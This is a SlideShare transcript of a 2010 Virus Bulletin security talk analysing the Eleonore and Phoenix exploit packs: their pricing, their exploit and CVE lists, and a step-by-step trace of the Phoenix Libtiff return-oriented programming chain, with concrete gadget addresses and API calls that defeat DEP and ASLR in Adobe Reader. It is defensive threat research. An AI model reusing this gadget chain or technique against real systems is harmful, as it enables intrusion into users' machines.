SlideShare una empresa de Scribd logo

The ROP Pack

Kurt Baumgartner
Kurt Baumgartner

Virus Bulletin 2010 presentation about return oriented programming techniques as implemented in mid-summer exploit packs to evade DEP and ASLR.

1 de 45
1 10/5/2010 Copyright 2010. All Rights Reserved.
• Exploit Packs – Pricing Model, Development, Marketing – Deliverables • Technical Characteristics – DEP and ASLR Obstacles – Exploits – Shellcode and ROP Techniques – Payloads 2 10/5/2010 Copyright 2010. All Rights Reserved.
• Recent Eleonore, Phoenix Market Activity – Feature Sets – Marketing and Support – Comparable Pricing Models – Development and Outsourcing – MOAUB no Effect 3 10/5/2010 Copyright 2010. All Rights Reserved.
• Eleonore Market Activity – Version Updates – Marketing and Support – Pricing Model – Development and Outsourcing 4 10/5/2010 Copyright 2010. All Rights Reserved.
• Eleonore Exploits and Shellcode – Exploit List – Metasploit Appropriation – Effectiveness – DEP, ASLR and Metasploit – Updates and Support 5 10/5/2010 Copyright 2010. All Rights Reserved.
• Eleonore Exploit List v1.4.4 MDAC  (MS06-014) //MSIE MS009-02 //MSIE DX DirectShow //MSIE ActiveX pack //MSIE compareTo //FF JNO (JS navigator Object Code) //FF MS06-006 //FF Font tags //FF Telnet //Opera PDF collab.getIcon //All PDF Util.Printf //All PDF collab.collectEmailInfo //All Java D&E //All Soc pack (iframe ver) //All PDF MEDIA.NEWPLAYER(); //All Java_gsb added //All 6 10/5/2010 Copyright 2010. All Rights Reserved.
Jun-09 Jul-09 Jul-09 Oct-09 1 1.1 1.2 1.3 MSIE - MDAC MSIE - MDAC MSIE - MDAC MSIE - MDAC MSIE - MS009-02 MSIE - MS009-02 MSIE - MS009-02 MSIE - MS009-02 Snapshot Snapshot Snapshot Snapshot Opera - Telnet Opera - Telnet Opera - Telnet Opera - Telnet Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow MS Office - Spreadsheet MS Office - Spreadsheet Java D&E 7 10/5/2010 Copyright 2010. All Rights Reserved.
Nov-09 Dec-09 Mar-10 Jun-10 1.3.1 1.3.2 1.4.1 1.4.4 MSIE - MDAC MSIE - MDAC MDAC MDAC MSIE - MS009-02 MSIE - MS009-02 JDT MS009-02 Snapshot Snapshot PDF collab.getIcon DX DirectShow Opera - Telnet Opera - Telnet PDF collab.collectEmailInfo ActiveX pack Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon PDF NewPlayer compareTo Adobe - PDF Util.Printf Adobe - PDF Util.Printf Java GSB 1.5/1.6 (targeting Vista and 7) JNO (JS navigator Object Code) 8 10/5/2010
Nov-09 Dec-09 Mar-10 Jun-10 1.3.1 1.3.2 1.4.1 1.4.4 Adobe - PDF Util.Printf Adobe - PDF Util.Printf Java GSB 1.5/1.6 (targeting Vista and 7) JNO (JS navigator Object Code) Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo MS06-006 Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags Font tags IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow Telnet MS Office - Spreadsheet MS Office - Spreadsheet PDF collab.getIcon Java D&E Java D&E PDF Util.Printf Java Calender PDF collab.collectEmailInfo Adobe - PDF Doc.media.newPlayer (0day) Java D&E 9 10/5/2010
• Throughout summer 2010, underground forum activity confirms accepting attitudes of buyers towards code rips “And if the author of something borrowed from someone else's code, I do not think this is shameful. Sometimes it is just easier. Why rebuild the wheel?” 10 10/5/2010 Copyright 2010. All Rights Reserved.
– June 2010, Eleonore v.1.4.1 being sold by its author for $2000 • Rebuild at a different domain / IP = $ 50 • Updates = from $ 100 • Bundle-bound domain 11 10/5/2010 Copyright 2010. All Rights Reserved.
• Phoenix Exploits and Shellcode – Exploit List – Metasploit Appropriation and Effectiveness • Libtiff Exploitation – Stack BoF SecurityFocus, Tavis Ormandy 2006 – Metasploit - Windows XP SP3, DEP, ASLR – Updates and Support – Outside Development and Input 12 10/5/2010 Copyright 2010. All Rights Reserved.
• Phoenix Exploits and Shellcode – Acrobat LibTiff CVE-2010-0188 Metasploit rip, replaced – Acrobat newPlayer CVE-2009-4324 – JDK CVE-2008-5353 – JAVA GSB CVE-2009-3867  Metasploit rip – MDAC (MS06-014) CVE-2006-0003 – SnapShot ActiveX CVE-2008-2463 – IE Peers CVE-2010-0806  Metasploit rip – Acrobat util.printf CVE-2008-2992 – Acrobat CollectEmailInfo CVE-2007-5659 – Acrobat CollabgetIcon CVE-2009-0927 – Flash CVE-2007-0071 – Flash AVM2 CVE-2009-1869 13 10/5/2010 Copyright 2010. All Rights Reserved.
• Pricing, Updates and Support – Single Domain License ~2000WMZ – Updates and domain rebuilds to evade blacklist additions: ~50WMZ – Suggest >35% “punching” – V2.2 contained 12 exploits, sold with guarantee of continuous improvements – Delivering on guarantee, v2.3 arrived in late July with improved Libtiff exploit, effectively evading DEP and ASLR 14 10/5/2010 Copyright 2010. All Rights Reserved.
• ROP - Phoenix Libtiff Exploit – Client Side Target over 200 Mb Compiled Code • Adobe Acrobat 9.3 and LibTiff, Open Source – Libtiff v3.8.1 Vulnerability circa 2006 – Exploitation • DEP and ASLR Evasion – ROP • Strategy • Unique ROP Implementation – Traditional Shellcode Payload 15 10/5/2010 Copyright 2010. All Rights Reserved.
• Client Side Target – Adobe Acrobat 9.3 • “To date, more than 500 million copies of Adobe Reader have been distributed worldwide on 23 platforms and in 33 languages.” • DEP and ASLR on Vista, Win7 – PDF Format • Pdfdigger, Deflate – escript.api • Objects, Methods, Properties • Compressed 1,500 line script – AcroForm.api • Libtiff and embedded files 16 10/5/2010 Copyright 2010. All Rights Reserved.
• Client Side Target – ASLR, Permanent DEP • RSA Crypto-C ME 2 • IBM International Components for Unicode 17 10/5/2010 Copyright 2010. All Rights Reserved.
• Phoenix Libtiff ROP – Strategy • GetESP, Allocate, Copy, Jump – Unique ROP Implementation vs. Previously Documented • DEP evasion in 15 return chain links • writeprocessmemory, séance? 18 10/5/2010 Copyright 2010. All Rights Reserved.
AcroForm.api… Esp -> 0x080c 0c00 0x20cb 5a5a: 0xffff ffff xor eax, eax icucnv36.4a80 1f90 leave icucnv36.4a84 9038 (&kernel32.CreateFileMapping) retn icucnv.4a80 7e7d 0xffff ffff 19 10/5/2010 Copyright 2010. All Rights Reserved.
Esp -> 0x080c 0c00 0x20cb 5a5a: xor eax, eax 0xffff ffff leave icucnv36.4a80 1f90 retn icucnv36.4a84 9038 (&kernel32.CreateFileMapping) icucnv.4a80 7e7d 0xffff ffff 0xffff ffff 20 10/5/2010 Copyright 2010. All Rights Reserved.
0x20cb 5a5a: 0x080c 0c00 xor eax, eax 0xffff ffff leave Esp -> icucnv36.4a80 1f90 retn icucnv36.4a84 9038 (&kernel32.CreateFileMapping) icucnv.4a80 7e7d 0xffff ffff 0xffff ffff 21 10/5/2010 Copyright 2010. All Rights Reserved.
0x20cb 5a5a: 0x080c 0c00 xor eax, eax leave 0xffff ffff retn icucnv36.4a80 1f90 0x4a80 1f90: Esp -> icucnv36.4a84 9038 (&kernel32.CreateFileMapping) pop eax icucnv.4a80 7e7d 0xffff ffff retn 0xffff ffff 22 10/5/2010 Copyright 2010. All Rights Reserved.
0x20cb 5a5a: 0x080c 0c00 xor eax, eax leave 0xffff ffff retn icucnv36.4a80 1f90 0x4a80 1f90: icucnv36.4a84 9038 (&kernel32.CreateFileMapping) pop eax icucnv.4a80 7e7d 0xffff ffff retn Esp -> 0xffff ffff 0x4a80 7e7d: call near dword ptr [eax] eax = &kernel32.CreateFileMapping 23 10/5/2010 Copyright 2010. All Rights Reserved.
Esp -> 0xffff ffff 0x4a80 7e7d: call near dword ptr [eax] 0x0000 0000 CreateFileMapping(0xffffffff,0x00000000, 0x0000 0040 0x00000040,0x00001000,0x00000000) 0x0000 0000 retn (PAGE_EXECUTE_READWRITE) 0x0000 ffff 0xffff 1000 0x0000 0000 24 10/5/2010 Copyright 2010. All Rights Reserved.
0x0000 0000 0x4a80 7e7d: call near dword ptr [eax] 0x0000 0040 CreateFileMapping(0xffffffff,0x00000000, 0x0000 0000 0x00000040,0x00001000) 0x0000 1000 retn 0x0000 0000 0xffff ffff Esp -> 0x4a80 1063 25 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1063: pop ebp Esp -> 0x0f60 2020 retn 0x4a80 13df 0x0000 0001 26 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1063: pop ebp 0x0f60 2020 retn Esp -> 0x4a80 13df 0x0000 0001 27 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1063: pop ebp 0x0f60 2020 retn 0x4a80 13df 0x4a80 13df: Esp -> 0x0000 0001 leave retn 28 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1063: leave Esp -> 0x4a80 63a5 retn 0x0f60 203c 0x4a80 13df: 0x4a80 2196 leave retn 29 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 13df: leave retn Esp -> 0x0f60 203c 0x4a80 203c: 0x4a80 2196 leave 0x4a80 1f90 retn 0x4a80 9030 0x4a80 63a5: &kernel32.MapViewofFile pop ecx retn 30 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 13df: leave retn 0x0f60 203c 0x4a80 203c: Esp -> 0x4a80 2196 leave 0x4a80 1f90 retn 0x4a80 9030 0x4a80 63a5: &kernel32.MapViewofFile pop ecx retn 31 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 2196: 0x4a80 9f90 mov dword ptr [ecx], eax Esp -> 0x4a80 1f90 retn 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 9030 32 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 2196: 0x4a80 9f90 mov dword ptr [ecx], eax Esp -> 0x4a80 1f90 retn 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 7e7d 33 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1f90: 0x4a80 9f90 pop eax ; POKE GADGET 0x4a80 1f90 retn Esp -> 0x4a80 9030 &kernel32.MapViewOfFile 0x4a80 7e7d 34 10/5/2010 Copyright 2010. All Rights Reserved.
Esp -> 0x4a80 7e7d 0x4a80 1f90: 0x0000 00fc pop eax 0x0000 0026 retn 0x0000 0000 0x4a80 7e7d: 0x0000 0000 call [eax] ret 0x4a80 8871 35 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1f90: 0x0000 00fc Esp -> pop eax 0x0000 0026 retn 0x4a80 7e7d: 0x0000 0000 call [eax] 0x0000 0000 kernel32.MapViewOfFile 0x4a80 8871 ret 36 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 1f90: 0x0000 00fc pop eax 0x0000 0026 retn 0x0000 0000 0x4a80 7e7d: 0x0000 0000 call [eax] kernel32.MapViewOfFile ret Esp -> 0x4a80 8871 37 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 8871: Esp -> dest = 0x024f 0000 push eax call <&jmp.memcpy> ;copy payload src = 0x0f60 2064 blob to CreateFileMapping memory page add esp, 0x0c n = 0x0000 0400 mov eax, esi 0x4141 4141 pop esi pop edi 0x4141 4141 leave ret 0x9090 9090 38 10/5/2010 Copyright 2010. All Rights Reserved.
0x4a80 8871: Esp -> 0x024f 0000 push eax call <&jmp.memcpy> 0x0f60 2064 add esp, 0x0c 0x0000 0400 mov eax, esi pop esi 0x4141 4141 pop edi 0x4141 4141 leave ret 0x9090 9090 39 10/5/2010 Copyright 2010. All Rights Reserved.
0x024f 0000: Esp -> 0x024f 0000 nop ;start of traditional 0x0f60 2064 Xor’d shellcode payload stub 0x0000 0400 nop 0x4141 4141 nop nop 0x4141 4141 jmp short 0x024f 001c 0x9090 9090 40 10/5/2010 Copyright 2010. All Rights Reserved.
• Bridge to traditional payload • DEP Evasion = – AcroForm.api, Msvcr80.dll, icucnv36.dll, allocated executable memory space via file mapping and view – Return chain of 15 links – CreateFileMapping + MapViewOfFile + memcpy + relative jmp (0xeb 16) 41 10/5/2010 Copyright 2010. All Rights Reserved.
42 10/5/2010 Copyright 2010. All Rights Reserved.
• Exploit packs continue to be prevalent and a relevant threat • The exploit pack marketplace is continually growing and changing • Much of the exploit pack marketplace is predictable • ROP shellcoding techniques are a novel, recent phenomenon for the commodity exploit pack marketplace • The latest defensive technology OS implementation successes are being evaded by "generic" attacks 43 10/5/2010 Copyright 2010. All Rights Reserved.
Libtiff vulnerability (CVE-2006-3459) http://downloads.securityfocus.com/vulnerabilities/exploits/19283.c http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3459 http://www.adobe.com/support/security/bulletins/apsb10-07.html Data Execution Prevention (DEP - Hardware and Software based) http://support.microsoft.com/kb/875352 Address Space Load Randomization (ASLR) http://technet.microsoft.com/en-us/magazine/2007.04.vistakernel.aspx Metasploit “Adobe Acrobat Bundled LibTIFF Integer Overflow”, villy, jduck Return Oriented Exploitation, Dino Dai Zovi, Blackhat 2010 https://media.blackhat.com/bh-us-10/presentations/Zovi/BlackHat-USA-2010-DaiZovi-Return-Oriented-Exploitation-slides.pdf Malware Intelligence Blog, Jorge Mieres http://malwareint.blogspot.com/2010/09/phoenix-exploits-kit-v21-inside.html 44 10/5/2010 Copyright 2010. All Rights Reserved.
Kurt_dot_Baumgartner@kaspersky.com

Recomendados

OSGi Best Practices - Tim Ward
OSGi Best Practices - Tim WardOSGi Best Practices - Tim Ward
OSGi Best Practices - Tim Wardmfrancis
 
ビジネスオープンソースソフトウェアの衝撃
ビジネスオープンソースソフトウェアの衝撃ビジネスオープンソースソフトウェアの衝撃
ビジネスオープンソースソフトウェアの衝撃OSSラボ株式会社
 
The OSGi Framework Multiplication
The OSGi Framework MultiplicationThe OSGi Framework Multiplication
The OSGi Framework MultiplicationClément Escoffier
 
Spring integration integration, but not only...
Spring integration integration, but not only...Spring integration integration, but not only...
Spring integration integration, but not only...Artem Bilan
 
Jax2010 adobe lcds
Jax2010 adobe lcdsJax2010 adobe lcds
Jax2010 adobe lcdsMichael Chaize
 
Cloud services brokerages evaluating the business case
Cloud services brokerages evaluating the business caseCloud services brokerages evaluating the business case
Cloud services brokerages evaluating the business caseSteve Crawford
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt Baumgartner
 
מצגת קורס אלקטרוניקה
מצגת קורס אלקטרוניקהמצגת קורס אלקטרוניקה
מצגת קורס אלקטרוניקהgoodvibes
 

Recomendados

OSGi Best Practices - Tim Ward
OSGi Best Practices - Tim WardOSGi Best Practices - Tim Ward
OSGi Best Practices - Tim Wardmfrancis
 
ビジネスオープンソースソフトウェアの衝撃
ビジネスオープンソースソフトウェアの衝撃ビジネスオープンソースソフトウェアの衝撃
ビジネスオープンソースソフトウェアの衝撃OSSラボ株式会社
 
The OSGi Framework Multiplication
The OSGi Framework MultiplicationThe OSGi Framework Multiplication
The OSGi Framework MultiplicationClément Escoffier
 
Spring integration integration, but not only...
Spring integration integration, but not only...Spring integration integration, but not only...
Spring integration integration, but not only...Artem Bilan
 
Jax2010 adobe lcds
Jax2010 adobe lcdsJax2010 adobe lcds
Jax2010 adobe lcdsMichael Chaize
 
Cloud services brokerages evaluating the business case
Cloud services brokerages evaluating the business caseCloud services brokerages evaluating the business case
Cloud services brokerages evaluating the business caseSteve Crawford
 
Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt baumgartner lan_deskse2012
Kurt baumgartner lan_deskse2012Kurt Baumgartner
 
מצגת קורס אלקטרוניקה
מצגת קורס אלקטרוניקהמצגת קורס אלקטרוניקה
מצגת קורס אלקטרוניקהgoodvibes
 
z/VSE Update and Outlook
z/VSE Update and Outlookz/VSE Update and Outlook
z/VSE Update and OutlookIBM India Smarter Computing
 
My video is a file, now what?
My video is a file, now what?My video is a file, now what?
My video is a file, now what?Marie Josée (MJ) Drouin
 
IBM z/VSE V4.3 - More capacity for growth
IBM z/VSE V4.3 - More capacity for growthIBM z/VSE V4.3 - More capacity for growth
IBM z/VSE V4.3 - More capacity for growthIBM India Smarter Computing
 
Unveiling FME 2013
Unveiling FME 2013Unveiling FME 2013
Unveiling FME 2013Safe Software
 
UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4tfennelly
 
OpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee WebinarOpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee WebinarMatterport
 
Dynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to ConsumptionDynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to ConsumptionAlpen-Adria-Universität
 
オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介OSSラボ株式会社
 
Mozilla In Malaysia
Mozilla In MalaysiaMozilla In Malaysia
Mozilla In MalaysiaGen Kanai
 
Introduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinalIntroduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinalMarie Josée (MJ) Drouin
 
Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009Fred Sauer
 
iPhone Web Development
iPhone Web DevelopmentiPhone Web Development
iPhone Web DevelopmentAndy Peters
 
CVMaxSpoFormatIng
CVMaxSpoFormatIngCVMaxSpoFormatIng
CVMaxSpoFormatIngMassimo Sposato
 
Securing Data Transfers using IPv6/VSE
Securing Data Transfers using IPv6/VSESecuring Data Transfers using IPv6/VSE
Securing Data Transfers using IPv6/VSEIBM India Smarter Computing
 
Presentation of Dominos future plans
Presentation of Dominos future plansPresentation of Dominos future plans
Presentation of Dominos future plansdominion
 
Flash Applications For Mobile
Flash Applications For MobileFlash Applications For Mobile
Flash Applications For MobileSerge Jespers
 
RDI Multimedia Services Overview
RDI Multimedia Services OverviewRDI Multimedia Services Overview
RDI Multimedia Services Overviewshey4ever
 
เฉลยคำตอบ O
เฉลยคำตอบ Oเฉลยคำตอบ O
เฉลยคำตอบ OSurapong Jakang
 
z/VSE V5.1 Update
z/VSE V5.1 Updatez/VSE V5.1 Update
z/VSE V5.1 UpdateIBM India Smarter Computing
 
VSE/POWER, all the news since z/VSE 4.2
VSE/POWER, all the news since z/VSE 4.2VSE/POWER, all the news since z/VSE 4.2
VSE/POWER, all the news since z/VSE 4.2IBM India Smarter Computing
 
Billington 2013 IceFog APT
Billington 2013 IceFog APTBillington 2013 IceFog APT
Billington 2013 IceFog APTKurt Baumgartner
 
WiFi Insecurity2013
WiFi Insecurity2013WiFi Insecurity2013
WiFi Insecurity2013Kurt Baumgartner
 

Más contenido relacionado

Similar a The ROP Pack

UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4tfennelly
 
OpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee WebinarOpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee WebinarMatterport
 
Dynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to ConsumptionDynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to ConsumptionAlpen-Adria-Universität
 
オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介OSSラボ株式会社
 
Mozilla In Malaysia
Mozilla In MalaysiaMozilla In Malaysia
Mozilla In MalaysiaGen Kanai
 
Introduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinalIntroduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinalMarie Josée (MJ) Drouin
 
Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009Fred Sauer
 
iPhone Web Development
iPhone Web DevelopmentiPhone Web Development
iPhone Web DevelopmentAndy Peters
 
Presentation of Dominos future plans
Presentation of Dominos future plansPresentation of Dominos future plans
Presentation of Dominos future plansdominion
 
Flash Applications For Mobile
Flash Applications For MobileFlash Applications For Mobile
Flash Applications For MobileSerge Jespers
 
RDI Multimedia Services Overview
RDI Multimedia Services OverviewRDI Multimedia Services Overview
RDI Multimedia Services Overviewshey4ever
 
เฉลยคำตอบ O
เฉลยคำตอบ Oเฉลยคำตอบ O
เฉลยคำตอบ OSurapong Jakang
 

Similar a The ROP Pack (20)

z/VSE Update and Outlook
z/VSE Update and Outlookz/VSE Update and Outlook
z/VSE Update and Outlook
 
My video is a file, now what?
My video is a file, now what?My video is a file, now what?
My video is a file, now what?
 
IBM z/VSE V4.3 - More capacity for growth
IBM z/VSE V4.3 - More capacity for growthIBM z/VSE V4.3 - More capacity for growth
IBM z/VSE V4.3 - More capacity for growth
 
Unveiling FME 2013
Unveiling FME 2013Unveiling FME 2013
Unveiling FME 2013
 
UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4UN/EDIFACT Interchange Processing with Smooks v1.4
UN/EDIFACT Interchange Processing with Smooks v1.4
 
OpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee WebinarOpenID Foundation Retail Advisory Committee Webinar
OpenID Foundation Retail Advisory Committee Webinar
 
Dynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to ConsumptionDynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
Dynamic Adaptive Streaming over HTTP: From Content Creation to Consumption
 
オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介オープンBIツール Eclipse BIRT紹介
オープンBIツール Eclipse BIRT紹介
 
Mozilla In Malaysia
Mozilla In MalaysiaMozilla In Malaysia
Mozilla In Malaysia
 
Introduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinalIntroduction of file based workflows 111004 vfinal
Introduction of file based workflows 111004 vfinal
 
Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009Google Web Toolkit for the Enterprise Developer - JBoss World 2009
Google Web Toolkit for the Enterprise Developer - JBoss World 2009
 
iPhone Web Development
iPhone Web DevelopmentiPhone Web Development
iPhone Web Development
 
CVMaxSpoFormatIng
CVMaxSpoFormatIngCVMaxSpoFormatIng
CVMaxSpoFormatIng
 
Securing Data Transfers using IPv6/VSE
Securing Data Transfers using IPv6/VSESecuring Data Transfers using IPv6/VSE
Securing Data Transfers using IPv6/VSE
 
Presentation of Dominos future plans
Presentation of Dominos future plansPresentation of Dominos future plans
Presentation of Dominos future plans
 
Flash Applications For Mobile
Flash Applications For MobileFlash Applications For Mobile
Flash Applications For Mobile
 
RDI Multimedia Services Overview
RDI Multimedia Services OverviewRDI Multimedia Services Overview
RDI Multimedia Services Overview
 
เฉลยคำตอบ O
เฉลยคำตอบ Oเฉลยคำตอบ O
เฉลยคำตอบ O
 
z/VSE V5.1 Update
z/VSE V5.1 Updatez/VSE V5.1 Update
z/VSE V5.1 Update
 
VSE/POWER, all the news since z/VSE 4.2
VSE/POWER, all the news since z/VSE 4.2VSE/POWER, all the news since z/VSE 4.2
VSE/POWER, all the news since z/VSE 4.2
 

Más de Kurt Baumgartner

Billington 2013 IceFog APT
Billington 2013 IceFog APTBillington 2013 IceFog APT
Billington 2013 IceFog APTKurt Baumgartner
 
2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset
2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset
2011 Wintel Targeted Attacks and a Post-Windows Environment APT ToolsetKurt Baumgartner
 
Not-so Passive Sonar - Red October
Not-so Passive Sonar - Red OctoberNot-so Passive Sonar - Red October
Not-so Passive Sonar - Red OctoberKurt Baumgartner
 

Más de Kurt Baumgartner (7)

Billington 2013 IceFog APT
Billington 2013 IceFog APTBillington 2013 IceFog APT
Billington 2013 IceFog APT
 
WiFi Insecurity2013
WiFi Insecurity2013WiFi Insecurity2013
WiFi Insecurity2013
 
2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset
2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset
2011 Wintel Targeted Attacks and a Post-Windows Environment APT Toolset
 
Not-so Passive Sonar - Red October
Not-so Passive Sonar - Red OctoberNot-so Passive Sonar - Red October
Not-so Passive Sonar - Red October
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
 
Recent Rogueware
Recent RoguewareRecent Rogueware
Recent Rogueware
 
Storm Worm - Malware 2.0
Storm Worm - Malware 2.0Storm Worm - Malware 2.0
Storm Worm - Malware 2.0
 

The ROP Pack

  • 1. 1 10/5/2010 Copyright 2010. All Rights Reserved.
  • 2. • Exploit Packs – Pricing Model, Development, Marketing – Deliverables • Technical Characteristics – DEP and ASLR Obstacles – Exploits – Shellcode and ROP Techniques – Payloads 2 10/5/2010 Copyright 2010. All Rights Reserved.
  • 3. • Recent Eleonore, Phoenix Market Activity – Feature Sets – Marketing and Support – Comparable Pricing Models – Development and Outsourcing – MOAUB no Effect 3 10/5/2010 Copyright 2010. All Rights Reserved.
  • 4. • Eleonore Market Activity – Version Updates – Marketing and Support – Pricing Model – Development and Outsourcing 4 10/5/2010 Copyright 2010. All Rights Reserved.
  • 5. • Eleonore Exploits and Shellcode – Exploit List – Metasploit Appropriation – Effectiveness – DEP, ASLR and Metasploit – Updates and Support 5 10/5/2010 Copyright 2010. All Rights Reserved.
  • 6. Eleonore Exploit List v1.4.4 MDAC  (MS06-014) //MSIE MS009-02 //MSIE DX DirectShow //MSIE ActiveX pack //MSIE compareTo //FF JNO (JS navigator Object Code) //FF MS06-006 //FF Font tags //FF Telnet //Opera PDF collab.getIcon //All PDF Util.Printf //All PDF collab.collectEmailInfo //All Java D&E //All Soc pack (iframe ver) //All PDF MEDIA.NEWPLAYER(); //All Java_gsb added //All 6 10/5/2010 Copyright 2010. All Rights Reserved.
  • 7. Jun-09 Jul-09 Jul-09 Oct-09 1 1.1 1.2 1.3 MSIE - MDAC MSIE - MDAC MSIE - MDAC MSIE - MDAC MSIE - MS009-02 MSIE - MS009-02 MSIE - MS009-02 MSIE - MS009-02 Snapshot Snapshot Snapshot Snapshot Opera - Telnet Opera - Telnet Opera - Telnet Opera - Telnet Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF Util.Printf Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow MS Office - Spreadsheet MS Office - Spreadsheet Java D&E 7 10/5/2010 Copyright 2010. All Rights Reserved.
  • 8. Nov-09 Dec-09 Mar-10 Jun-10 1.3.1 1.3.2 1.4.1 1.4.4 MSIE - MDAC MSIE - MDAC MDAC MDAC MSIE - MS009-02 MSIE - MS009-02 JDT MS009-02 Snapshot Snapshot PDF collab.getIcon DX DirectShow Opera - Telnet Opera - Telnet PDF collab.collectEmailInfo ActiveX pack Adobe - PDF collab.getIcon Adobe - PDF collab.getIcon PDF NewPlayer compareTo Adobe - PDF Util.Printf Adobe - PDF Util.Printf Java GSB 1.5/1.6 (targeting Vista and 7) JNO (JS navigator Object Code) 8 10/5/2010
  • 9. Nov-09 Dec-09 Mar-10 Jun-10 1.3.1 1.3.2 1.4.1 1.4.4 Adobe - PDF Util.Printf Adobe - PDF Util.Printf Java GSB 1.5/1.6 (targeting Vista and 7) JNO (JS navigator Object Code) Adobe - PDF collab.collectEmailInfo Adobe - PDF collab.collectEmailInfo MS06-006 Firefox (v3.5) - Font tags Firefox (v3.5) - Font tags Font tags IE (v6, v7) - DirectX DirectShow IE (v6, v7) - DirectX DirectShow Telnet MS Office - Spreadsheet MS Office - Spreadsheet PDF collab.getIcon Java D&E Java D&E PDF Util.Printf Java Calender PDF collab.collectEmailInfo Adobe - PDF Doc.media.newPlayer (0day) Java D&E 9 10/5/2010
  • 10. • Throughout summer 2010, underground forum activity confirms accepting attitudes of buyers towards code rips “And if the author of something borrowed from someone else's code, I do not think this is shameful. Sometimes it is just easier. Why rebuild the wheel?” 10 10/5/2010 Copyright 2010. All Rights Reserved.
